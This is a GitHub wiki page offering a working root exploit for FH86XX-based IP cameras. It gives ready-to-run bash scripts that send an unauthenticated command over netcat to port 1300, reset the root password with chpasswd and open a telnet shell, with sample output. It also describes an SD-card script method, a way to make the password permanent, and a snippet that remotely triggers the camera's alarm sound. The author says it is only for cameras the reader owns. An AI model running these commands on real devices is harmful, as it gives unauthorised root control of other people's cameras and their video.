FH86XX based Cameras root exploit. This may, or indeed may not work on your camera. You use it entirely at your own risk. - pingumacpenguin/FH86XX_Cameras GitHub Wiki

Your FH86XX based camera may be vulnerable to an exploit that allows us to execute code on the device as root.

Obviously you can only do this to cameras that you own. If you hack into somebody else's camera, you can expect the full weight of the law to come down on you in whatever jurisdiction you reside. I do not advocate doing anything illegal with this knowledge.

I can't claim credit for finding this trick, that goes to some useful info I found in some very intersting posts on Redit from Mediocre-Peanut982 (https://www.reddit.com/r/hardwarehacking/comments/1bnelr9/comment/lc6uyco/)

also (https://www.reddit.com/r/hardwarehacking/comments/1cu1vus/comment/l8o29xo/)

All credit therefore to Mediocre-Peanut982 on redit for the basic idea, to which I added a few refinements. Here is my take on Mediocre-Peanut982's script.

vuln.sh

Save the above vuln.sh bash script and run it for instructions.

(Linux only of course, unless you like to torture yourself with Windoze's bizarre linux shell extensions).

  $ ./vuln.sh 
  USAGE [vuln.sh OPTION IP NEW_PASSWORD]
  To check for vulnerabilities    : vuln.sh check IP new_password
  If vulnerable, password will be changed to whatever you pass as new_password and you will be offered the chance to telnet to the device
   
  To see the image of the camera  : vuln.sh show
  This assumes you have alredy run vuln.sh to gnerate the image
  $ 

This should give you unfettered root access.

NOTE: This root access only lasts till a reboot using this method.

It does not permanently change the root password, as this is stored in a separate area of flash.

It only alters the temporary /etc/shadow file, which doesn't survive a reboot.

Here it is in action.

 $ ./vuln.sh check ipcam1 wombat
 [.]Checking RCE in port 1300
 [+]Vulnerability Found
 [+]RCE is available on port 1300
 [.]Checking RCE in port 843
 [-]Port 843 isn't vulnerable to RCE
 [.]Checking telnet access
 [+]Telnet is available on port 23
 [.]Trying to get a live image
 [-]Getting live image failed
 [?]Do you want to get a shell[y/n]: y
 [+]Changing root hash
 [+]Response: <SYSTEM_ACK>ok</SYSTEM_ACK>
 [+]Log in via this LOGIN:root PASSWD:wombat
 [+]


 Trying 192.168.7.4...
 Connected to ipcam1.
 Escape character is '^]'.
 (none) login: root
 Password: 


 BusyBox v1.26.2 (2023-08-17 14:38:28 CST) built-in shell (ash)
 Enter 'help' for a list of built-in commands.

 [/app]# 

The second method involves adding a file to the SD card and rebooting the camera.

SECOND_METHOD

First, insert an sd card into the camera and let it boot up and run.

Then remove the sd card.

Create a directory on the sd card called upgrade. Inside that directory, create a script called iu.sh and inside iu.sh write this echo "root:root" | chpasswd

Then, close the file and make it executable with "chmod +x iu.sh"

Now unmount the sd card put it back on the camera boot the camera and telnet into it via root:root.

For what its worth, you could use root:wombat to set the password to wombat, or whatever.

Thanks again to (Mediocre-Peanut982) for the tip.

My condensed version of the first method is below.

#!/bin/bash
ip="${1:-unknown_ip}"
port="${2:-1300}"
new_password="${3:-root}"

response=$(echo "<SYSTEM>echo \"root:$new_password\" | chpasswd</SYSTEM>" | nc "$ip" "$port");
echo "$response"
telnet $ip 

Save this as quickroot.sh and chmod it +x

Run with at minimum the ip, but you can add the port and an alternative password if you want.

$ ./quickroot.sh ipcam1
Trying 192.168.7.4...
Connected to ipcam1.
Escape character is '^]'.
(none) login: root
Password: 


BusyBox v1.26.2 (2023-08-17 14:38:28 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

[/app]# 

One more trick. Say you want to permanently set the root password to "wombat2"

Telnet to the camera and enter this...

echo root:wombat2 | chpasswd; cp /etc/shadow /app/userdata/shadow; cd /app; /app/app_shadow.sh
reboot

When the camera has restarted, you should now be able to use the new root password.

The camera is no more secure than it ever was however as the original exploit will still work, so if you forget the new password, simply start again.

Whether any of this trickery is likely to break anything I have no idea, so it goes without saying, you do any, or all of this entirely at your own risk

That's all for now. Have fun.

Oh.. and speaking of fun...

#!/bin/bash
ip="${1:-ipcam1}"
port="${2:-1300}"
response=$(echo "<SYSTEM> /app/abin/playaudio /app/res/wav/alarm.aac </SYSTEM>" | nc "$ip" "$port");
echo "$response"

I'm sure you can figure out what that does pretty easily.